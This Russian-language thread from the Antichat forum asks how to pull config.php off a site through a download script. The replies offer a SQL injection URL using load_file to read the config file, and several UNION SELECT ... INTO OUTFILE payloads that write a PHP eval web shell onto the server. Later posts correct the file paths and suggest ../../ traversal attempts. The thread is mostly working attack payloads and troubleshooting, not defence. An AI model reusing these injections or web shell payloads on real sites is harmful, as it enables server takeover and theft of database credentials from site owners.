ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.01.2009, 01:13
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Код:
<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8"); 
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>
SAVE_FILES - путь откуда скачиваються файл
 
Ответить с цитированием

  #2  
Старый 25.01.2009, 01:24
_evgeniy_
Новичок
Регистрация: 07.09.2008
Сообщений: 26
С нами: 9302190

Репутация: 26
По умолчанию

Цитата:
Сообщение от diznt  
вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
неполучится скачать, нет SQL-инекции в запросе
 
Ответить с цитированием

  #3  
Старый 25.01.2009, 13:52
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от diznt  
вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Код:
<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8"); 
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>
SAVE_FILES - путь откуда скачиваються файл
Цитата:
upload.php?id=-1+union+select+load_file('/folder/config.php'),2--+
первая сточка

Цитата:
тоже нужно переводить в чар?
необязательно (левая часть)

Последний раз редактировалось l1ght; 25.01.2009 в 14:01..
 
Ответить с цитированием

  #4  
Старый 25.01.2009, 15:26
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами: 9227224

Репутация: 60
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql‘])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'file://localhost/C:/shell.php'

если все верно,шел доступен по адресу
http://localhost/shell.php

Я правильно понимаю?
Запрос Верно составлен?
 
Ответить с цитированием

  #5  
Старый 25.01.2009, 13:37
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами: 9227224

Репутация: 60
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

Последний раз редактировалось jokester; 25.01.2009 в 13:54.. Причина: Не в ту кнопку ткнул )
 
Ответить с цитированием

  #6  
Старый 25.01.2009, 13:54
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от kevmen  
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?
Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

'/путь/shell.php'
 
Ответить с цитированием

  #7  
Старый 25.01.2009, 14:00
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами: 9227224

Репутация: 60
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester
 
Ответить с цитированием

  #8  
Старый 25.01.2009, 14:04
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от kevmen  
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester
Нет, путь нужен полный от корня, или если винда , то с диска. Ты-же на локалке тренируешься? Пробуй лить с такими ../../ путями, и с полными, потом поиском ищи куда залилось, и сам всё поймёшь
 
Ответить с цитированием

  #9  
Старый 25.01.2009, 15:41
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Нет , Локальный путь, то что ты видишь в проводнике(или что там у тебя), а не в браузере. И доступен он будет там куда ты его положишь.

Тоесть (например для денвера)
http://localhost/ ------- это Z:\home\localhost\www\

Льём
INTO+OUTFILE+'Z:\home\localhost\www\shell.php'

доступен:
http://localhost/shell.php
 
Ответить с цитированием

  #10  
Старый 25.01.2009, 15:58
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

l1ght

нет не хочет почему то
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.